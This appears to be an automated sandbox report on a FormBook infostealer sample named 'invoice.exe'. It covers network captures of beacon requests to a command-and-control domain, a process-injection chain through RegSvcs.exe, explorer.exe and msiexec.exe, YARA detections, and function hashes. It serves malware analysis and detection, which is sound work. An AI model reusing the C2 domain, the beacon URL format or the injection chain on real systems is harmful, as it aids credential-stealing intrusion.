1SX2jqPejYHbs5UPzFlx4J0kc_MO(WAPD6oOUrZ9HmyOe75dLhVvGd2V67mMdUPNcI88lwpctxoHo33ZI_h_fW~vP1qezFsW(DUah25JoMkbeqqEOlqakvzJAgFAXI(sPgNJRMCFt-4nHHfAHyTuRNltePZs2Kqy6F824tmsK6r7gbi3J5HNRgB3PyHuI5Ba40D9~nuLiv3PGs6UGEjladVa(yuGPA4tuasQrWuIKdNscgu3FlVE5jYxWlWNg3P0ZM4AuKun(yDaOWij0B45YV2iLzHZ(rqWxEByxeExji5i9jt0nBNUum0kI0GLEVmZu4WSAjMI5TqO(b0JdQPyvb6-NH3p6AFNImEpyD1q5oO-UqozaoWrTggeaajdz0q53t5Tkk~K3HH4YINRI7XNr0dj5Ff8hXzt8rkgsLWlxwmIB9D8yzMtdvLrUkROMK6bVszoP3S5cT1h0iistWYf3e56mo90zVuuQSlYVtfZoWjfPDeTSGpQRjPDBiE9hREszeAveIDmajPINMJRukyx3HAviyKISbhm7aaS2hXUKcPVLKyQq3sIn9ZO1ROu0A0EPr2Q14EDua3orT0ztUrhg8Eo5IzqvFxLceEhY8gi9NgeSJfOSE4tQlYFWHWcpynddpOk0tiWgX(v5AAWWTscUpHgd2135zl7FAHGcDEzw8LEf5~fMarfVtopk3MA6siqBM32337SiUxkQ-AEQUp_KAZ9lPrwwKcFPI7aXsgHMdOZjTT5ijTB(ogFT-p3dYMolDtVmzyhX86P7x2DqJn9KVdc46jPnXHSglib97wVTx(baxqn2dhxxHeuXm~reZPPirTYVMITkPxlJcsoZnc_V7W3TuawsbmryfdQ9okqnTIjUy9yyEcGJq9HVw7C(01pj5McBOji9trT0yJSl9cChg(9edTdqUkRNA4k1hz2c3EzOOPbaLsjH_BbEbcT(t4Epn2sySdciihyPw6hmEkI1IYdtNqofeNR~Drc4Ne5QMfgp9uV~glh~rvyhPh9SbfEiVF_42IZ6jP_aguT6YBRyjZbRRwYvsQMyW6U35GnHf1eAkaPL7StW7Zz3Qyn(Eu9I86-l-J_eIbAW4pmXJ~KYHaGJXxa9OYrCnFHuTjVuYehD6jae8sSAFsGbPavrscHvaHUFSPk9hb4W0AFxgJDvTqTzAU8EIscoZ84afXDjLH3iHq9CNJgPrbTxRTLL5uqPdMq3bk1nbN9nM(zOy27IQn3qfc-5ZToY_B7lmgKwqWuarWFDBMNKpAeybpmPeKkLhQzSTNQQLJ1eMGhvc38SBP-~_VC45SNevCarZ26fI~F5uyNpR71ToLP76tpTM0xWlO_B0NYSG(4j6rUAShItcAWy4d9JddJV6G1sASb5Ehx4Lkel7p-LSEC7KMXAxGkBtLjswbJvr6hmkqJElnOlNG0SeOEmOE_IxOrUVDiH3BFx9s7dhiIlzg0bVGgdAbo6NIUwGCyCjgQ6UHVAUBErwRCMDOqqsi8eoscFLkSgnvHoWfv(J32~moIRKn7XZDDuMpa5AUp~uq6AYAJHqJ6biWVtHagBAw8cnHxH7x5G1hxULB70YFxo7p3WnvwcwMb0yTT86Msq70Gvc9RSuCMOUjsQJ1ife8FCIVrGxj6MLzhTWDPqqbc8NnjCW9jTkLbNPv1YOcr1X9oNZIJZdFu4ddTUEhBxCiwQqJqwFzENJTIAAfgkx~aJVVpWqW544VJgdcYYndkx3glo4yu4lRsj86_Oo(q6Skg9nFNk-3fkypeTDzfDmc8SiA0wedYZDsFFemvwdCId0IStZVmvKSCLDV65wipe70h8Ugj1_yw2veJK9PoavwvuCjCTO5Pf9xkFl9VkQPWHc6OLlSTM99Xlxelu54q7Hb-5VkTyvpsEUeiUZpbpH1WyFNiWtHTA4Gkt44sWYIFjjxUktkJeIXkHhHlAZPuLzpzrzzrYS4gaq2aO7SmuEIQvaY19acXRbUjw9PcWJ4RzHXswBp23AefwC(Hz5XN353MoxZpnsJ-HOhe6CFzc1qz4K8gEi5HKFXQYjhMPpayBScV1Ud1lAg7PLAsFF~Pov0IQqkhUWPFQE21QhhYvDgpOkPonfGc86cBW4WUA9sUxxlBsArgf_SwjwuVcR6rGBeYnH6p~yAyCi9pNu7dNKw8BtG2~DkjoA75S9(5vIW5yykDBfYmy1utLvBD57slRwZeECsWE9DPZdp42LSShECLiuMvg068psQhsPnxZUzFpmf_MI9QUJr9TRwH3B1AgxX8SSBbpr2olhVA2zpkRf9tQ-ACMMWHogzKXD5AuWF1~HfBAvyMN18UdXvcTABQAHnt~brfR1jHaypODfVLf3QBBYfcfrzkQa5x3e9SVx0pvV6y42u4mGNZT2a24wAq2yDkT6~mxmh3Cny4a5XFj-nkdGQ60YViUht_U8WbwOPCzTXYCvBH4d19RoVrArYyYK~ElYk14d2LvvFlsRDuQixNV8Or(o3qkQ6a35~uCownROk6KPNxrXU7XPhy2u3GNnSW1OMhQwwvzN7-GO3aqISfPDbiRsAUshcDHGp2vhikWT6VsWrdi8m1CZJbYPuaA6gs4iKLakladkwS(lxmfAU_FUIDeFPK19FirRfgHsBGiDz81XJ3H4D7aRWeQwiDcBLaZNYcUQsnCSLmMtCqyG95t8KIc-MAmMyxPmR9IeqFqv2_YmaB79v330dHACBNq_XnONucS63Eg5zBucBHMKc1y37zKZyztFvjRFmCH03y5BmMt0XdxlEZUsTBuM4IvvjieQW-D9ujI4BXrhQzSE8ovMIHMwNkjCwpPmudhVP9KfqoRE~PG8I9SjhVypGyLq~PtALCC8nkj-ylA66rDOoiVkG9IWgwWSGVFSyg62Y4Prie9v89tHrbdWLP4_dQTR6rwvYdlLKBytgA0EclmjT622R1sTsux_P5Xo9wJJ8WptYNBCtwNZ3gt3zFeHaAejOW(z2VT-ofV1bTVyo_FdqCFq2HhXlZYlasIEmvElsEr1c1hjvt1LXThyNFMnSwYI(VsSMAtqHl0TJNTOPW6MjG0dvzZGJCzCCIPY1y3t1U8j3n4W5Xmm4Wjl2OBeSI0VngKJM2fzqn1QHUEk7c8Tn5y6eQJctby4HKISN_cndHxXyHgh7Wx5oY99vIgHseWuk-SA9pfrYnBHM4szACU-BTa7pjJKh-tmkSvxUDoklmCdURrrLQcE2CPUTJN_4SItdCYbrd3eP5syHaOnXsIs~kalLJ(Kj2sjcuIHixZU8W~-jRWh3jYadob8bPpKjEi_QTVr4Es3rfx8ilwPzZ5JAR3PEXbsrm~O7HThClW_pdqI4XglcQ44NySWX7ILyHXUcNie0jMpd7HDkI7r7U8KzflylM5nifyM9BJDNcn18Gx5ZltAn2ViKhaOwHjP6I7H43mrixA3e2
Oct 16, 2022 05:31:05.251173019 CEST	150	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sun, 16 Oct 2022 03:31:05 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://soft-r.pro/dj6o/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49705	194.58.112.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:31:07.270884991 CEST	150	OUT	GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw== HTTP/1.1 Host: www.soft-r.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 16, 2022 05:31:07.328385115 CEST	151	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sun, 16 Oct 2022 03:31:07 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw== Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: invoice.exePID: 1784, Parent PID: 3452

General

Target ID:	0
Start time:	05:29:00
Start date:	16/10/2022
Path:	C:\Users\user\Desktop\invoice.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\invoice.exe
Imagebase:	0x310000
File size:	965120 bytes
MD5 hash:	6CB9C745DFA97E0E9C7F3C2CDEFEA36E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 5440, Parent PID: 1784

General

Target ID:	1
Start time:	05:29:13
Start date:	16/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x4b0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.376676313.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 5440

General

Target ID:	2
Start time:	05:29:19
Start date:	16/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 5196, Parent PID: 3452

General

Target ID:	12
Start time:	05:30:01
Start date:	16/10/2022
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0xb00000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: invoice.exePID: 1784, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	252
Total number of Limit Nodes:	9

Executed Functions

Function 06E4A3B0 Relevance: .6, Instructions: 627COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.292408926.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdae12a9686323f378095bdb72ef16292dc1311099b32b662eb527f6299a3a0
Instruction ID: a787f96544ffdc6eba85f553d10a0e0f879389d31aab38fdd1bde5629008692e
Opcode Fuzzy Hash: 8bdae12a9686323f378095bdb72ef16292dc1311099b32b662eb527f6299a3a0
Instruction Fuzzy Hash: EE32AF30E042589FDB64EFB8D8947AEB7F6EF84304F108169D10AAB389DB749D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0256203D Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25cd9cfa26a86d2dc77294bd62d95dad22d88dca00f031df4b7fe4c3c20901c
Instruction ID: 53889a1ea627502c373ffa3c8f824b6f16dc28289a84da36ba066cb6eed4ae6a
Opcode Fuzzy Hash: b25cd9cfa26a86d2dc77294bd62d95dad22d88dca00f031df4b7fe4c3c20901c
Instruction Fuzzy Hash: F8A16B70E19208DFCB14CFA5D6885ADFBB6BF89310F24A82AD905FB254D734A841CF18

Uniqueness

Uniqueness Score: -1.00%

Function 04D10700 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c4f17c0cc62a47f10bb96c3c1167f9e55ed96863362b42b0d758b24a833266
Instruction ID: 1f8ec5d664676da723526519525b367e3c8c844c82d1bbf26a68adc9a9f1d860
Opcode Fuzzy Hash: c1c4f17c0cc62a47f10bb96c3c1167f9e55ed96863362b42b0d758b24a833266
Instruction Fuzzy Hash: 4291A035E003199FDB04EFB0D8549DDB7BAFF89304F548216E505AF264EB74A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04D106D0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee24fec1cdad7768c4f71847a3838b504838004fc2ee73938bca9e95f36214c
Instruction ID: c16109df60712fe8599cd8e8a43c813fe41e5811a19fdafdf25be5eeb903bfd8
Opcode Fuzzy Hash: 4ee24fec1cdad7768c4f71847a3838b504838004fc2ee73938bca9e95f36214c
Instruction Fuzzy Hash: 6D81C335E003099FCB01DFB0D8549DDBBBAFF8A304F558616E515AF2A0EB70A885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06E4D500 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.292408926.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee2a1c4dedf295d593bdaf9a562b4763d30206d2322791e83b51a52cb06d7ac
Instruction ID: 773f45cb4bfca938db136c1e16c835f822212ab4b7a52ac12d0cb23591cad1f7
Opcode Fuzzy Hash: 6ee2a1c4dedf295d593bdaf9a562b4763d30206d2322791e83b51a52cb06d7ac
Instruction Fuzzy Hash: 83510470E012199FCB04DFAAD980AAEFBF2FF88304F18D569E418A7255D734A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02562150 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88bcdab6e232173a044dcea664b336312ca70557a87ef65d94e2aaf1f4fc1203
Instruction ID: d9e33434ff59b130599fb02dad3612bc14e200a4d6d1e368405665c3d659b454
Opcode Fuzzy Hash: 88bcdab6e232173a044dcea664b336312ca70557a87ef65d94e2aaf1f4fc1203
Instruction Fuzzy Hash: C3413974E19209DFCB54CFA5E6845ADFBB6BF89310F20682AD905F7254D734A942CF08

Uniqueness

Uniqueness Score: -1.00%

Function 025636B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4540d2eebc91b16f1de0471dc0869d8f1d44020289d829256565f4b5bec555
Instruction ID: 3b4056cf2af688eff6a6bf4f4abf6befef53ea97a391419bba01b8365b478607
Opcode Fuzzy Hash: 6c4540d2eebc91b16f1de0471dc0869d8f1d44020289d829256565f4b5bec555
Instruction Fuzzy Hash: 051103B0D04258ABDB148FA5D818BFEBEF1BB4E715F1490AAD441B3290D7788A44CE68

Uniqueness

Uniqueness Score: -1.00%

Function 025636A9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c2e9ed2650037742b1ff4b2315ac159d338c56a3672be1efaf50c3d9b5d022
Instruction ID: 55e7484a28f6e4ffcb14a33f88bfc18b58ff6c99048c6408148d33fd05b61d31
Opcode Fuzzy Hash: b8c2e9ed2650037742b1ff4b2315ac159d338c56a3672be1efaf50c3d9b5d022
Instruction Fuzzy Hash: 5C1103B0D042589BEB148FA5D418BFDBFF1BB0E305F1494AAD451B3290C7788A44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 025615A0 Relevance: 1.6, APIs: 1, Instructions: 143
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 025616F3

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0a100e437283d33507d3c295c6dc7e753ab5588a645454a73942918392fb3f6f
Instruction ID: 7d7090e60875f66e889bae8b652e128a99ec354c7382a9c4e5ba2bdfcda6338e
Opcode Fuzzy Hash: 0a100e437283d33507d3c295c6dc7e753ab5588a645454a73942918392fb3f6f
Instruction Fuzzy Hash: 95512671901318DFDB20CF99C984BEDBBB2BF48314F15859AE808B7250DB745A89CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0256159D Relevance: 1.6, APIs: 1, Instructions: 142
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 025616F3

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 765b467cca628595f0c99c3be9e246fdeec5d8c2cea094f10e0206e9f9dd64ae
Instruction ID: 1f7c4f9dcf9067e215af45c557782a012d1bdb9bb6680a47dd2b94d46bfd10ce
Opcode Fuzzy Hash: 765b467cca628595f0c99c3be9e246fdeec5d8c2cea094f10e0206e9f9dd64ae
Instruction Fuzzy Hash: 2A510671901318DFDB20CF95C984BEDBBB1BF48314F15859AE908B7250DB745A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04D103F7 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D1050A

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fc31313aa3179da5ab968283fddfe90f5260e721043a86731e8a1a5f10f7ebeb
Instruction ID: fba3f27951da51a34a76e15dafed5dce87ef85117e4b41af52b185192ffb75bf
Opcode Fuzzy Hash: fc31313aa3179da5ab968283fddfe90f5260e721043a86731e8a1a5f10f7ebeb
Instruction Fuzzy Hash: DB41A2B1D00309AFDF15CF99D984ADDBBB5BF48314F24852AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04D103F8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D1050A

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e1297efcb1428c16201bc9ae0134749783086ed6196e529ea7a638e175d289be
Instruction ID: edda3731a55f9ac036865d3e77ef7de329479bb0ef60d38311e930b702bd78d5
Opcode Fuzzy Hash: e1297efcb1428c16201bc9ae0134749783086ed6196e529ea7a638e175d289be
Instruction Fuzzy Hash: 4D41A3B1D00309AFDF15CF99D984ADEBBB5BF48314F24852AE815AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04D12B30 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04D12BF1

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6cf56be41888512839d90e13ce74dc6baf2f1b80243258197134ba7b926e741d
Instruction ID: 9495f50e85421ee3030952de10e195721cf894f76941a2492fa4b6d028049cb9
Opcode Fuzzy Hash: 6cf56be41888512839d90e13ce74dc6baf2f1b80243258197134ba7b926e741d
Instruction Fuzzy Hash: AA415AB8900345DFDB10CF99C488BAABBF5FF88314F148499D908AB320D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04BCC499 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04BCC466,?,?,?,?,?), ref: 04BCC527

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fcceea1ebb03dc12fc24fed4cafd7e889e2200118d5d522acddb7661de37db79
Instruction ID: e4cf28ad74a7252a6142c812dc8309007e21bd4b9415a767e95baf72e8fc7162
Opcode Fuzzy Hash: fcceea1ebb03dc12fc24fed4cafd7e889e2200118d5d522acddb7661de37db79
Instruction Fuzzy Hash: 4A2116B5D002489FDB10CFAAD584BDEBFF4EB48320F14845AE954A3310C378A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04BCA8F4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04BCC466,?,?,?,?,?), ref: 04BCC527

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c72fc5cfe8262baaae9cc884e3a2fccd20f410e70f5cab4938a8fb1733f205b0
Instruction ID: 2b092cd45e595bbe7cd188445ea1b6f11d2039e096c6e053dfe749aa70eeb02b
Opcode Fuzzy Hash: c72fc5cfe8262baaae9cc884e3a2fccd20f410e70f5cab4938a8fb1733f205b0
Instruction Fuzzy Hash: B021E4B5900208AFDB10CF9AD584BEEBFF8EB48324F14845AE958A3310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02561B48 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02561BD5

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

